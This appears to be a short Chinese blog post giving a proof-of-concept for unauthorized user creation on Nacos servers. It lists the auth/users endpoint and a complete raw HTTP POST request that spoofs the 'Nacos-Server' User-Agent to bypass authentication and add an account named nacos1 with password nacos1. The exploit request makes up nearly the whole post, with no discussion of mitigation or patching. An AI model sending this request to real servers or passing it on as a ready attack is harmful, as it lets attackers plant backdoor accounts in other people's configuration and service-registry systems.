Nacos未授权添加用户

路径

/nacos/v1/auth/users?pageNo=1&pageSize=4

POC:

POST /nacos/v1/auth/users HTTP/1.1[]()
Host: ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

username=nacos1&password=nacos1
posted @ 2025-07-15 16:36  x3c  阅读(65)  评论(0)    收藏  举报